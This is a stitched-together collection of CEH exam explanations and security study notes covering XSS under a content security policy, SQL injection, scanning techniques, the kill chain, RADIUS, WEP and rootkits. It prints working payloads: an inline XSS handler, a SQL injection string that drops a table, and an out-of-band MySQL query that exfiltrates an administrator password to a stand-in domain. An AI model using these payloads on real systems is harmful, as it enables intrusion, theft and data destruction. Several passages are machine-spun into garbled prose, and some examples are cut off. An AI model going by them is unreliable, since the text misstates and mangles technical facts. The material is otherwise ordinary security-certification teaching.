Web Application Threats - Watering Hole Attack In a watering hole attack, the attacker identifies the kinds of websites a target company/individual frequently surfs and tests those particular websites to identify any possible vulnerabilities. Attacker injects malicious script/code into the web application that can redirect the webpage and download malware onto the victim machine. (P.1797/1781)

Vulnerability scanning software is a tool that can help security analysts identify and prioritize known vulnerabilities in their systems and applications. However, it is not a perfect solution and has some limitations that need to be considered. One of the most critical limitations is that vulnerability scanning software is not immune to software engineering flaws that might lead to serious vulnerabilities being missed. This means that the software itself might have bugs, errors, or oversights that could affect its accuracy, reliability, or performance. For example, the software might:

Fail to detect some vulnerabilities due to incomplete or outdated databases, incorrect signatures, or insufficient coverage of the target system or application.

Produce false positives or false negatives due to misinterpretation of the scan results, incorrect configuration, or lack of context or validation.

Cause unintended consequences or damage to the target system or application due to intrusive or aggressive scanning techniques, such as exploiting vulnerabilities, modifying data, or crashing services.

Be vulnerable to attacks or compromise by malicious actors who could exploit its weaknesses, tamper with its functionality, or steal its data.

Therefore, the security analyst should be most cautious about this limitation of vulnerability scanning software, as it could lead to a false sense of security, missed opportunities for remediation, or increased exposure to threats. The security analyst should always verify the scan results, use multiple tools and methods, and update and patch the software regularly to mitigate this risk.

The hacker’s next step to confirm the XSS vulnerability would be to utilize a script hosted on the application’s domain to test the form. This is because the application’s CSP allows scripts from its own domain, but not from inline or external sources. Therefore, the hacker can try to inject a payload that references a script file on the same domain as the application, such as:

where script.js contains some benign code, such as alert('XSS') or print('XSS'). If the script executes in the browser, then the hacker has confirmed the XSS vulnerability. Otherwise, the CSP has blocked the script and prevented the XSS attack.

The other options are not feasible or effective for the following reasons:

A. Try to disable the CSP to bypass script restrictions: This option is not feasible because the hacker cannot disable the CSP on the server side, and the browser enforces the CSP on the client side. The hacker would need to modify the browser settings or use a browser extension to disable the CSP, but this would not affect the victim’s browser or the application’s security.

B. Inject a benign script inline to the form to see if it executes: This option is not effective because the application’s CSP disallows inline scripts, meaning scripts that are embedded in the HTML code. Therefore, the hacker would not be able to inject a script tag or an event handler attribute that contains some code, such as:

 or <input type="text" onfocus="alert('XSS')">

The CSP would block these scripts and prevent the XSS attack.

D. Load a script from an external domain to test the vulnerability: This option is not effective because the application’s CSP disallows scripts from external domains, meaning scripts that are loaded from a different domain than the application. Therefore, the hacker would not be able to inject a script tag that references a script file on another domain, such as:

The CSP would block these scripts and prevent the XSS attack.

A DNS zone file contains resource records (RRs) that define mappings and configurations for domains and subdomains. The standard records found in a zone file include:

SOA (Start of Authority): Indicates the beginning of the zone file.

NS (Name Server): Specifies the authoritative name servers.

A (Address): Maps hostnames to IPv4 addresses.

MX (Mail Exchange): Specifies mail servers.

These records are essential for the DNS resolution process and mail routing.

From CEH v13 Official Courseware:

Module 3: DNS Enumeration

Topic: DNS Record Types

CEH v13 Study Guide states:

“A zone file contains all the resource records including SOA, NS, A, and MX. These define name server authority, IP resolution, and mail server routing.”

Incorrect Options:

A: DNS is a protocol, not a resource record.

B: PTR is for reverse DNS, typically in a separate reverse zone file.

C: AXFR is a DNS transfer mechanism, not an RR in the zone file.

False Positives occur when a scanner, Web Application Firewall (WAF), or Intrusion Prevention System (IPS) flags a security vulnerability that you do not have. A false negative is the opposite of a false positive, telling you that you don't have a vulnerability when, in fact, you do.

A false positive is like a false alarm; your house alarm goes off, but there is no burglar. In web application security, a false positive is when a web application security scanner indicates that there is a vulnerability on your website, such as SQL Injection, when, in reality, there is not. Web security experts and penetration testers use automated web application security scanners to ease the penetration testing process. These tools help them ensure that all web application attack surfaces are correctly tested in a reasonable amount of time. But many false positives tend to break down this process. If the first 20 variants are false, the penetration tester assumes that all the others are false positives and ignore the rest. By doing so, there is a good chance that real web application vulnerabilities will be left undetected.

When checking for false positives, you want to ensure that they are indeed false. By nature, we humans tend to start ignoring false positives rather quickly. For example, suppose a web application security scanner detects 100 SQL Injection vulnerabilities. If the first 20 variants are false positives, the penetration tester assumes that all the others are false positives and ignore all the rest. By doing so, there are chances that real web application vulnerabilities are left undetected. This is why it is crucial to check every vulnerability and deal with each false positive separately to ensure false positives.

https://en.wikipedia.org/wiki/Metasploit_Project

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7.

Its best-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

The Metasploit Project includes anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Metasploit is pre-installed in the Kali Linux operating system.

The basic steps for exploiting a system using the Framework include.

1. Optionally checking whether the intended target system is vulnerable to an exploit.

2. Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 900 different exploits for Windows, Unix/Linux and macOS systems are included).

3. Choosing and configuring a payload (code that will be executed on the target system upon successful entry; for instance, a remote shell or a VNC server). Metasploit often recommends a payload that should work.

4. Choosing the encoding technique so that hexadecimal opcodes known as "bad characters" are removed from the payload, these characters will cause the exploit to fail.

5. Executing the exploit.

This modular approach – allowing the combination of any exploit with any payload – is the major advantage of the Framework. It facilitates the tasks of attackers, exploit writers and payload writers.

In order to circumvent network protection tools, cybercriminals may forge a TCP session more efficiently by submitting a bogus SYN packet, a series of ACK packets, and at least one RST (reset) or FIN (connection termination) packet. This tactic allows crooks to get around defenses that only keep tabs on incoming traffic rather than analyzing return traffic.

Before enforcing policies or issuing warnings, the most effective first step is to educate employees. Awareness training helps build a foundational understanding of risks and best practices, especially in low-security cultures.

━━━━━━━━━━━━━━━━━━━━━━

An iPhone client’s most noticeably terrible bad dream is to have somebody oversee his/her gadget, including the capacity to record and control all action without waiting be in a similar room. In this blog entry, we present another weakness called “Trustjacking”, which permits an aggressor to do precisely that.

This weakness misuses an iOS highlight called iTunes Wi-Fi sync, which permits a client to deal with their iOS gadget without genuinely interfacing it to their PC. A solitary tap by the iOS gadget proprietor when the two are associated with a similar organization permits an assailant to oversee the gadget. Furthermore, we will stroll through past related weaknesses and show the progressions that iPhone has made to alleviate them, and why these are adequately not to forestall comparative assaults.

After interfacing an iOS gadget to another PC, the clients are being found out if they trust the associated PC or not. Deciding to believe the PC permits it to speak with the iOS gadget by means of the standard iTunes APIs.

This permits the PC to get to the photographs on the gadget, perform reinforcement, introduce applications and considerably more, without requiring another affirmation from the client and with no recognizable sign. Besides, this permits enacting the “iTunes Wi-Fi sync” highlight, which makes it conceivable to proceed with this sort of correspondence with the gadget even after it has been detached from the PC, as long as the PC and the iOS gadget are associated with a similar organization. It is intriguing to take note of that empowering “iTunes Wi-Fi sync” doesn’t need the casualty’s endorsement and can be directed simply from the PC side.

Getting a live stream of the gadget’s screen should be possible effectively by consistently requesting screen captures and showing or recording them distantly.

It is imperative to take note of that other than the underlying single purpose of disappointment, approving the vindictive PC, there is no other component that forestalls this proceeded with access. Likewise, there isn’t anything that informs the clients that by approving the PC they permit admittance to their gadget even in the wake of detaching the USB link.

Weaponization

The adversary analyzes the data collected in the previous stage to identify the

vulnerabilities and techniques that can exploit and gain unauthorized access to the

target organization. Based on the vulnerabilities identified during analysis, the adversary

selects or creates a tailored deliverable malicious payload (remote-access malware

weapon) using an exploit and a backdoor to send it to the victim. An adversary may

target specific network devices, operating systems, endpoint devices, or even

individuals within the organization to carry out their attack. For example, the adversary

may send a phishing email to an employee of the target organization, which may include a malicious attachment such as a virus or worm that, when downloaded, installs a backdoor on the system that allows remote access to the adversary. The following are the activities of the adversary: o Identifying appropriate malware payload based on the analysis o Creating a new malware payload or selecting, reusing, modifying the available malware payloads based on the identified vulnerability

o Creating a phishing email campaign o Leveraging exploit kits and botnets

https://en.wikipedia.org/wiki/Kill_chain

The Cyber Kill Chain consists of 7 steps: Reconnaissance, weaponization, delivery, exploitation, installation, command and control, and finally, actions on objectives. Below you can find detailed information on each.

1. Reconnaissance: In this step, the attacker/intruder chooses their target. Then they conduct in-depth research on this target to identify its vulnerabilities that can be exploited.

2. Weaponization: In this step, the intruder creates a malware weapon like a virus, worm, or such to exploit the target's vulnerabilities. Depending on the target and the purpose of the attacker, this malware can exploit new, undetected vulnerabilities (also known as the zero-day exploits) or focus on a combination of different vulnerabilities.

3. Delivery: This step involves transmitting the weapon to the target. The intruder/attacker can employ different USB drives, e-mail attachments, and websites for this purpose.

4. Exploitation: In this step, the malware starts the action. The program code of the malware is triggered to exploit the target’s vulnerability/vulnerabilities.

5. Installation: In this step, the malware installs an access point for the intruder/attacker. This access point is also known as the backdoor.

6. Command and Control: The malware gives the intruder/attacker access to the network/system.

7. Actions on Objective: Once the attacker/intruder gains persistent access, they finally take action to fulfill their purposes, such as encryption for ransom, data exfiltration, or even data destruction.

Web Server Attacks - DNS Server Hijacking Attacker compromises the DNS server and changes the DNS settings so that all the requests coming towards the target web server are redirected to his/her own malicious server. (P.1623/1607)

The payload that would have the most significant impact in the case of a successful SQL injection attack is OR ‘a’='a; DROP TABLE members; --. This payload combines the manipulation of the WHERE clause with a destructive action, causing data loss. This payload works as follows:

The OR ‘a’='a part of the payload is a logical expression that is always true, regardless of the input or the condition of the SQL statement. This part of the payload allows the attacker to bypass any authentication or authorization checks that may be implemented in the SQL statement, such as a login form or a search query.

The ; part of the payload is a statement terminator that marks the end of the current SQL statement and allows the attacker to inject another SQL statement after it. This part of the payload enables the attacker to execute multiple SQL statements in a single query, which is also known as stacked queries or batched queries.

The DROP TABLE members part of the payload is a destructive SQL statement that deletes the entire table named members from the database. This part of the payload causes data loss and may compromise the functionality and integrity of the application that relies on the table. The table name may vary depending on the target database, but the attacker can use other techniques, such as error-based or union-based SQL injection, to discover the table names before executing the drop statement.

The – part of the payload is a comment symbol that tells the SQL engine to ignore the rest of the query. This part of the payload helps the attacker to avoid any syntax errors or unwanted results that may arise from the original query.

The other options are not as impactful as option C for the following reasons:

A. ‘OR 'T="1: This payload manipulates the WHERE clause of an SQL statement, allowing the attacker to view unauthorized data. This payload is a common and basic SQL injection technique that injects a logical expression that is always true, such as 'OR 'T="1 or 'OR 1=1, to bypass the authentication or authorization checks of the SQL statement. This payload can allow the attacker to view data that they are not supposed to, such as user credentials, personal information, or financial records. However, this payload does not cause any data loss or modification, and it does not affect the functionality or integrity of the application.

B. ‘OR username LIKE '%: This payload uses the LIKE operator to search for a specific pattern in a column. This payload is a variation of the previous payload that injects a logical expression that is always true, such as 'OR username LIKE '% or 'OR 1 LIKE '%, to bypass the authentication or authorization checks of the SQL statement. The LIKE operator is used to compare a value with a pattern that may contain wildcard characters, such as % or _, which match any string or character. This payload can allow the attacker to view data that matches the pattern, such as usernames that start with a certain letter or contain a certain substring. However, this payload does not cause any data loss or modification, and it does not affect the functionality or integrity of the application.

D. UNION SELECT NULL, NULL, NULL – : This payload manipulates the UNION SQL operator, enabling the attacker to retrieve data from different database tables. This payload is an advanced SQL injection technique that injects the UNION SQL operator to combine the results of two or more SELECT statements into a single result set, which is then returned as part of the HTTP response. The UNION operator can be used to join the results from different tables that have the same number and type of columns. The NULL values are used to match the column types and avoid any errors. This payload can allow the attacker to retrieve data from tables that are not intended to be accessed by the application, such as system tables, configuration tables, or backup tables. However, this payload does not cause any data loss or modification, and it does not affect the functionality or integrity of the application.

TCP Maimon scan

This scan technique is very similar to NULL, FIN, and Xmas scan, but the probe used here is

FIN/ACK. In most cases, to determine if the port is open or closed, the RST packet should be generated as a response to a probe request. However, in many BSD systems, the port is open if the packet gets dropped in response to a probe.

https://nmap.org/book/scan-methods-maimon-scan.html

How Nmap interprets responses to a Maimon scan probe

Probe Response Assigned State

No response received (even after retransmissions) open|filtered

TCP RST packet closed

ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) filtered

Adware, or advertising supported computer code, is computer code that displays unwanted advertisements on your pc. Adware programs can tend to serve you pop-up ads, will modification your browser’s homepage, add spyware and simply bombard your device with advertisements. Adware may be a additional summary name for doubtless unwanted programs. It’s roughly a virulent disease and it’s going to not be as clearly malicious as a great deal of different problematic code floating around on the net. create no mistake concerning it, though, that adware has to return off of no matter machine it’s on. Not solely will adware be extremely annoying whenever you utilize your machine, it might additionally cause semipermanent problems for your device.

Adware a network users the browser to gather your internet browsing history so as to ’target’ advertisements that appear tailored to your interests. At their most innocuous, adware infections square measure simply annoying. as an example, adware barrages you with pop-up ads that may create your net expertise markedly slower and additional labor intensive.

When using exploits, you might gain access as only a local user. This limits what you can do on the target machine. You can use Meterpreters 'getsystem` command (https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70) to elevate your permissions from a local administrator to SYSTEM. This works by using three elevation techniques.

DNS zone transfers occur when a secondary name server (slave) checks the Start of Authority (SOA) record from the primary server. The serial number in the SOA indicates the version of the zone file.

If:

Primary SOA serial > Secondary SOA serial

→ Zone transfer is initiated by the secondary server to update its data.

From CEH v13:

Module 3: DNS Enumeration

Topic: Zone Transfers and SOA Logic

CEH v13 Study Guide states:

“A secondary name server periodically queries the primary name server for changes. If the serial number in the SOA record is higher on the primary, it indicates a zone update, and a zone transfer is triggered.”

Incorrect Options:

B: Reversed condition

C/D: Restarting services doesn’t necessarily trigger a transfer

E: TTL expiration affects caching, not zone transfer logic

https://en.wikipedia.org/wiki/RADIUS

Remote Authentication Dial-In User Service (RADIUS) is a networking protocol that provides centralized authentication, authorization, and accounting (AAA) management for users who connect and use a network service.

RADIUS is a client/server protocol that runs in the application layer, and can use either TCP or UDP. Network access servers, which control access to a network, usually contain a RADIUS client component that communicates with the RADIUS server. RADIUS is often the back-end of choice for 802.1X authentication. A RADIUS server is usually a background process running on UNIX or Microsoft Windows.

Authentication and authorization

The user or machine sends a request to a Network Access Server (NAS) to gain access to a particular network resource using access credentials. The credentials are passed to the NAS device via the link-layer protocol—for example, Point-to-Point Protocol (PPP) in the case of many dialup or DSL providers or posted in an HTTPS secure web form.

In turn, the NAS sends a RADIUS Access Request message to the RADIUS server, requesting authorization to grant access via the RADIUS protocol.

This request includes access credentials, typically in the form of username and password or security certificate provided by the user. Additionally, the request may contain other information which the NAS knows about the user, such as its network address or phone number, and information regarding the user's physical point of attachment to the NAS.

The RADIUS server checks that the information is correct using authentication schemes such as PAP, CHAP or EAP. The user's proof of identification is verified, along with, optionally, other information related to the request, such as the user's network address or phone number, account status, and specific network service access privileges. Historically, RADIUS servers checked the user's information against a locally stored flat-file database. Modern RADIUS servers can do this or can refer to external sources—commonly SQL, Kerberos, LDAP, or Active Directory servers—to verify the user's credentials.

The RADIUS server then returns one of three responses to the NAS:

1) Access-Reject,

2) Access-Challenge,

3) Access-Accept.

Access-Reject

The user is unconditionally denied access to all requested network resources. Reasons may include failure to provide proof of identification or an unknown or inactive user account.

Access-Challenge

Requests additional information from the user such as a secondary password, PIN, token, or card. Access-Challenge is also used in more complex authentication dialogs where a secure tunnel is established between the user machine and the Radius Server in a way that the access credentials are hidden from the NAS.

Access-Accept

The user is granted access. Once the user is authenticated, the RADIUS server will often check that the user is authorized to use the network service requested. A given user may be allowed to use a company's wireless network, but not its VPN service, for example. Again, this information may be stored locally on the RADIUS server or may be looked up in an external source such as LDAP or Active Directory.

Risk Mitigation

Risk mitigation can be defined as taking steps to reduce adverse effects. There are four types of risk mitigation strategies that hold unique to Business Continuity and Disaster Recovery. When mitigating risk, it’s important to develop a strategy that closely relates to and matches your company’s profile.

Risk Acceptance

Risk acceptance does not reduce any effects; however, it is still considered a strategy. This strategy is a common option when the cost of other risk management options such as avoidance or limitation may outweigh the cost of the risk itself. A company that doesn’t want to spend a lot of money on avoiding risks that do not have a high possibility of occurring will use the risk acceptance strategy.

Risk Avoidance

Risk avoidance is the opposite of risk acceptance. It is the action that avoids any exposure to the risk whatsoever. It’s important to note that risk avoidance is usually the most expensive of all risk mitigation options.

Risk Limitation

Risk limitation is the most common risk management strategy used by businesses. This strategy limits a company’s exposure by taking some action. It is a strategy employing a bit of risk acceptance and a bit of risk avoidance or an average of both. An example of risk limitation would be a company accepting that a disk drive may fail and avoiding a long period of failure by having backups.

Risk Transference

Risk transference is the involvement of handing risk off to a willing third party. For example, numerous companies outsource certain operations such as customer service, payroll services, etc. This can be beneficial for a company if a transferred risk is not a core competency of that company. It can also be used so a company can focus more on its core competencies.

https://en.wikipedia.org/wiki/Network_Time_Protocol

The Network Time Protocol (NTP) is a networking protocol for clock synchronization between computer systems over packet-switched, variable-latency data networks.

NTP is intended to synchronize all participating computers within a few milliseconds of Coordinated Universal Time (UTC). It uses the intersection algorithm, a modified version of Marzullo's algorithm, to select accurate time servers and is designed to mitigate variable network latency effects. NTP can usually maintain time to within tens of milliseconds over the public Internet and achieve better than one millisecond accuracy in local area networks. Asymmetric routes and network congestion can cause errors of 100 ms or more.

The protocol is usually described in terms of a client-server model but can easily be used in peer-to-peer relationships where both peers consider the other to be a potential time source. Implementations send and receive timestamps using the User Datagram Protocol (UDP) on port number 123.

A dictionary Attack as an attack vector utilized by the attacker to break in a very system, that is password protected, by golf shot technically each word in a very dictionary as a variety of password for that system. This attack vector could be a variety of Brute Force Attack.

The lexicon will contain words from an English dictionary and conjointly some leaked list of commonly used passwords and once combined with common character substitution with numbers, will generally be terribly effective and quick.

How is it done?

Basically, it’s attempting each single word that’s already ready. it’s done victimization machine-controlled tools that strive all the possible words within the dictionary.

Some password Cracking Software:

• John the ripper

• L0phtCrack

• Aircrack-ng

A NULL scan is a type of TCP scan where no TCP flags are set in the packet. This unconventional packet is used to evade firewalls and intrusion detection systems and to determine the state of a port based on the response.

Behavior:

Open port → No response

Closed port → RST (Reset)

From CEH v13 Courseware:

Module 3: Scanning Networks

Topic: TCP Flag Scanning Methods

CEH v13 Study Guide states:

“A NULL scan sends a TCP packet with all flags turned off. The system’s response (or lack thereof) allows the attacker to infer whether a port is open or closed, especially on UNIX-based systems.”

Incorrect Options:

B: Vague and inaccurate

C: Refers to Xmas scan (URG, PSH, FIN)

D/E: Irrelevant to TCP flags

Static Network Address Translation (Static NAT) allows a single private IP address to be mapped to a single public IP address. This one-to-one mapping ensures that the same internal machine is always reachable through the same external IP address, which is crucial for "server publishing" — making internal servers (e.g., web servers, FTP servers) accessible from the internet.

From CEH v13 Courseware:

Module 03: Scanning Networks

Topic: Network Address Translation

Section: Types of NAT

CEH v13 Study Guide states:

“Static NAT provides a fixed translation of a private IP address to a public IP address. It is commonly used when an internal server must always be accessible from the Internet using a consistent IP address — this is known as server publishing.”

Incorrect Options:

A. Overloading PAT: Multiple private IPs share a single public IP using port numbers — not suited for static mappings.

B. Dynamic PAT: Similar to overloading; used for outbound traffic only.

C. Dynamic NAT: Assigns a public IP from a pool; the mapping can change, not suitable for server publishing.

Kernel-mode rootkits run with the best operating system privileges (Ring 0) by adding code or replacement parts of the core operating system, as well as each the kernel and associated device drivers. Most operative systems support kernel-mode device drivers, that execute with a similar privileges because the software itself. As such, several kernel-mode rootkits square measure developed as device drivers or loadable modules, like loadable kernel modules in Linux or device drivers in Microsoft Windows. This category of rootkit has unrestricted security access, however is tougher to jot down. The quality makes bugs common, and any bugs in code operative at the kernel level could seriously impact system stability, resulting in discovery of the rootkit. one amongst the primary wide familiar kernel rootkits was developed for Windows NT four.0 and discharged in Phrack magazine in 1999 by Greg Hoglund. Kernel rootkits is particularly tough to observe and take away as a result of they operate at a similar security level because the software itself, and square measure therefore able to intercept or subvert the foremost sure software operations. Any package, like antivirus package, running on the compromised system is equally vulnerable. during this scenario, no a part of the system is sure.

WEP encryption is an outdated and insecure method of protecting wireless networks from unauthorized access and eavesdropping. WEP uses a static key that can be easily cracked by various tools and techniques, such as capturing the initialization vectors, brute-forcing the key, or exploiting the weak key scheduling algorithm1. Therefore, you should recommend a more secure encryption method to enhance the security of the company’s wireless network.

One of the most suitable replacements for WEP encryption is WPA2-PSK with AES encryption. WPA2 stands for Wi-Fi Protected Access 2, which is a security standard that improves upon the previous WPA standard. WPA2 uses a robust encryption algorithm called AES, which stands for Advanced Encryption Standard. AES is a block cipher that uses a 128-bit key and is considered to be very secure and resistant to attacks2.

WPA2-PSK stands for WPA2 Pre-Shared Key, which is a mode of WPA2 that uses a passphrase or a password to generate the encryption key. The passphrase or password must be entered by the users who want to connect to the wireless network. The key is then derived from the passphrase or password using a function called PBKDF2, which stands for Password-Based Key Derivation Function 2. PBKDF2 adds a salt and a number of iterations to the passphrase or password to make it harder to crack3.

WPA2-PSK with AES encryption offers several advantages over WEP encryption, such as:

It uses a dynamic key that changes with each session, instead of a static key that remains the same.

It uses a stronger encryption algorithm that is more difficult to break, instead of a weaker encryption algorithm that is more vulnerable to attacks.

It uses a longer key that provides more security, instead of a shorter key that provides less security.

It uses a more secure key derivation function that adds complexity and randomness, instead of a simple key generation function that is predictable and flawed.

Therefore, you should recommend WPA2-PSK with AES encryption as a suitable replacement to enhance the security of the company’s wireless network.

WS-Security (Web Services Security) is a protocol specification that provides a means for securing SOAP-based messages. It defines how to add authentication, encryption, and digital signatures to SOAP headers, helping ensure message integrity and confidentiality.

According to CEH v13 Official Courseware:

WS-Security is an extension of SOAP.

It supports features such as:

Authentication via tokens (e.g., username, X.509)

Message integrity via digital signatures

Message confidentiality via XML encryption

Incorrect Options:

A. WSDL (Web Services Description Language) describes the web service interface but does not provide security.

B. WS Work Processes is not a defined web service security standard.

C. WS-Policy allows expressing security requirements, but enforcement is handled by WS-Security.

Reference – CEH v13 Official Courseware:

Module 14: Hacking Web Applications

Section: "Web Services Security"

Subsection: "WS-* Standards"

===========

In the Windows security model, SID ending in -500 is reserved for the built-in Administrator account. The SID seen in the image:

S-1-5-21-343818398-789336058-1343024091-500 → maps to user Joe

This proves that Joe is the true built-in administrator account on the domain EARTH.

From CEH v13 Courseware:

Module 4: Enumeration

Topic: SID Enumeration and Account Discovery

CEH v13 Study Guide states:

“In Windows, the account with RID 500 is always the default Administrator account. Even if renamed, its SID remains ending in -500. Enumeration of this SID allows attackers to identify privileged accounts.”

Incorrect Options:

A: Incomplete — it is not just that Joe has SID 500, but that SID 500 means Joe is the administrator.

B/C: These commands don’t validate Guest account status.

E: Incorrect — these commands explicitly prove administrator identity.

An untethered jailbreak is one that allows a telephone to finish a boot cycle when being pwned with none interruption to jailbreak-oriented practicality.

Untethered jailbreaks area unit the foremost sought-after of all, however they’re additionally the foremost difficult to attain due to the powerful exploits and organic process talent they need. associate unbound jailbreak is sent over a physical USB cable association to a laptop or directly on the device itself by approach of associate application-based exploit, like a web site in campaign.

Upon running associate unbound jailbreak, you’ll be able to flip your pwned telephone off and on once more while not running the jailbreak tool once more. all of your jailbreak tweaks and apps would then continue in operation with none user intervention necessary.

It’s been an extended time since IOS has gotten the unbound jailbreak treatment. the foremost recent example was the computer-based Pangu break, that supported most handsets that ran IOS nine.1. We’ve additionally witnessed associate unbound jailbreak within the kind of JailbreakMe, that allowed users to pwn their handsets directly from the mobile campaign applications programme while not a laptop.

Comprehensive and Detailed Explanation:

An Xmas scan is a type of stealth TCP scan that sets the FIN, PSH, and URG flags. According to RFC 793:

If the port is closed, the target responds with a TCP RST (Reset) packet.

If the port is open or filtered, there is no response.

Thus, receiving a RST response indicates a closed port.

From CEH v13 Courseware:

Module 3: Scanning Networks → TCP Flag Scanning Techniques

An ‘out-of-band’ SQL Injection attack is a type of SQL injection where the attacker does not receive a response from the attacked application on the same communication channel but instead is able to cause the application to send data to a remote endpoint that they control1. This technique can be used to bypass input validation and pattern matching measures that are based on the application’s responses. The attacker can use various SQL functions or commands that trigger DNS or HTTP requests, such as load_file, copy, dbms_ldap, etc., depending on the SQL server type123. By concatenating the data they want to extract with a domain name they own, the attacker can receive the data via DNS or HTTP logs. For example, the attacker can inject the following SQL query to exfiltrate the password of the administrator user from a MySQL database:

SELECT load_file(CONCAT('\\\\',(SELECT password FROM users WHERE username='administrator'),'.example.com\\\\test.txt'))

This will cause the application to send a DNS request to the domain password.example.com, where password is the actual value of the administrator’s password1.

· Identifying operating systems, services, protocols and devices,

· Collecting unencrypted information about usernames and passwords,

· Capturing network traffic for further analysis

are passive network sniffing methods since with the help of them we only receive information and do not make any changes to the target network. When modifying and replaying the captured network traffic, we are already starting to make changes and actively interact with it.

Wired Equivalent Privacy (WEP) may be a security protocol, laid out in the IEEE wireless local area network (Wi-Fi) standard, 802.11b, that’s designed to supply a wireless local area network (WLAN) with A level of security and privacy like what’s usually expected of a wired LAN. A wired local area network (LAN) is usually protected by physical security mechanisms (controlled access to a building, for example) that are effective for a controlled physical environment, but could also be ineffective for WLANs because radio waves aren’t necessarily bound by the walls containing the network. WEP seeks to determine similar protection thereto offered by the wired network’s physical security measures by encrypting data transmitted over the WLAN. encoding protects the vulnerable wireless link between clients and access points; once this measure has been taken, other typical LAN security mechanisms like password protection, end-to-end encryption, virtual private networks (VPNs), and authentication are often put in situ to make sure privacy.

A research group from the University of California at Berkeley recently published a report citing “major security flaws” in WEP that left WLANs using the protocol susceptible to attacks (called wireless equivalent privacy attacks). within the course of the group’s examination of the technology, they were ready to intercept and modify transmissions and gain access to restricted networks. The Wireless Ethernet Compatibility Alliance (WECA) claims that WEP – which is included in many networking products – was never intended to be the only security mechanism for a WLAN, and that, in conjunction with traditional security practices, it’s very effective.

A Slow HTTP POST attack is a type of denial-of-service (DoS) attack that exploits the way web servers handle HTTP requests. The attacker sends a legitimate HTTP POST header to the web server, specifying a large amount of data to be sent in the request body. However, the attacker then sends the data very slowly, keeping the connection open and occupying the server’s resources. The attacker can launch multiple such connections, exceeding the server’s capacity to handle concurrent requests and preventing legitimate users from accessing the web server.

The attack duration D is given by the formula D = a * b, where a is the number of connections and b is the hold-up time per connection. The attacker intends to maximize D by manipulating a and b. The server can manage m connections per second, but any connections exceeding m will overwhelm the system. Therefore, the scenario that is most likely to result in the longest duration of server unavailability is the one where a > m and b is the largest. Among the four options, this is the case for option B, where a = 100, m = 90, and b = 15. In this scenario, D = 100 * 15 = 1500 seconds, which is the longest among the four options. Option A has a larger b, but a < m, so the server can handle the connections without being overwhelmed. Option C has a > m, but a smaller b, so the attack duration is shorter. Option D has a > m, but a smaller b and a smaller difference between a and m, so the attack duration is also shorter. 

The best security practice in this scenario is to implement IEEE 802.1X. This is a port-based Network Access Control (NAC) protocol that provides authentication for devices before they are allowed to transmit traffic on the network. It ensures that only authorized users/devices can access the network through physical (wired) or wireless connections.

CEH v13 Official Courseware states:

“802.1X provides a framework for authenticating and authorizing devices attached to a LAN port, enforcing port-based network access control. It helps prevent unauthorized users from connecting to an internal network, particularly in environments where physical access to network jacks cannot be fully controlled.”

Incorrect Options:

A. Disabling unused ports is a good practice, but students may still use open ports intended for authorized personnel. It does not scale or provide identity-based access control.

B. Separating users in VLANs helps in segmentation, but it does not prevent unauthorized physical access to ports.

D. Asking students to use wireless is administrative, not a technical enforcement measure.

Reference – CEH v13 Guide:

Module 04: Enumeration

Topic: Network Access Control (802.1X) and Switch Port Security

===========

Ettercap is a comprehensive MITM attack tool that supports live traffic interception and content injection. It can modify HTTP streams in real time and inject malicious payloads, such as JavaScript or applets, into web traffic.

Reference – CEH v13 Official Study Guide:

Module 8: Sniffing

Quote:

“Ettercap allows attackers to intercept, analyze, and alter data on the fly, including injecting malicious content like Java applets in HTTP sessions during MITM attacks.”

Incorrect Options Explained:

A & D. Wireshark and Tcpdump are passive sniffers with no injection capability.

C. Aircrack-ng is for Wi-Fi key cracking, not traffic manipulation.

===========

A stealth virus may be a sort of virus malware that contains sophisticated means of avoiding detection by antivirus software. After it manages to urge into the now-infected machine a stealth viruses hides itself by continually renaming and moving itself round the disc.

Like other viruses, a stealth virus can take hold of the many parts of one’s PC. When taking control of the PC and performing tasks, antivirus programs can detect it, but a stealth virus sees that coming and can rename then copy itself to a special drive or area on the disc, before the antivirus software. Once moved and renamed a stealth virus will usually replace the detected ‘infected’ file with a clean file that doesn’t trigger anti-virus detection. It’s a never-ending game of cat and mouse.

The intelligent architecture of this sort of virus about guarantees it’s impossible to completely rid oneself of it once infected. One would need to completely wipe the pc and rebuild it from scratch to completely eradicate the presence of a stealth virus. Using regularly-updated antivirus software can reduce risk, but, as we all know, antivirus software is additionally caught in an endless cycle of finding new threats and protecting against them.

https://www.techslang.com/definition/what-is-a-stealth-virus/

https://www.infocyte.com/blog/2019/02/16/cybersecurity-101-what-you-need-to-know-about-false-positives-and-false-negatives/

False positives are mislabeled security alerts, indicating there is a threat when in actuality, there isn’t. These false/non-malicious alerts (SIEM events) increase noise for already over-worked security teams and can include software bugs, poorly written software, or unrecognized network traffic.

False negatives are uncaught cyber threats — overlooked by security tooling because they’re dormant, highly sophisticated (i.e. file-less or capable of lateral movement) or the security infrastructure in place lacks the technological ability to detect these attacks.

https://www.darknet.org.uk/2017/07/bluto-dns-recon-zone-transfer-brute-forcer/

"Attackers also use DNS lookup tools such as DNSdumpster.com, Bluto, and Domain Dossier to retrieve DNS records for a specified domain or hostname. These tools retrieve information such as domains and IP addresses, domain Whois records, DNS records, and network Whois records." CEH Module 02 Page 138

Comprehensive and Detailed Explanation:

This is a classic example of social engineering. When a system is well-secured technically, attackers often turn to exploiting human vulnerabilities — such as:

Talking to employees and gaining their trust

Bribing disgruntled or low-level staff

Gaining physical access or insider information through manipulation

From CEH v13 Courseware:

Module 7: Social Engineering

Incorrect Options:

A: Zero-days are rare and expensive; not always feasible.

C: DDoS is disruptive, not data-oriented.

D: MiTM is a complex network-based attack, unlikely effective against a hardened internal mainframe.

One of the most important actions to secure a web server from common threats is to regularly update and patch the server software. This includes the operating system, the web server software, the database software, and any other applications or frameworks that run on the server. Updating and patching the server software can fix known vulnerabilities, bugs, or errors that could be exploited by attackers to compromise the server or the website. Failing to update and patch the server software can expose the server to common attacks, such as SQL injection, cross-site scripting, remote code execution, denial-of-service, etc.

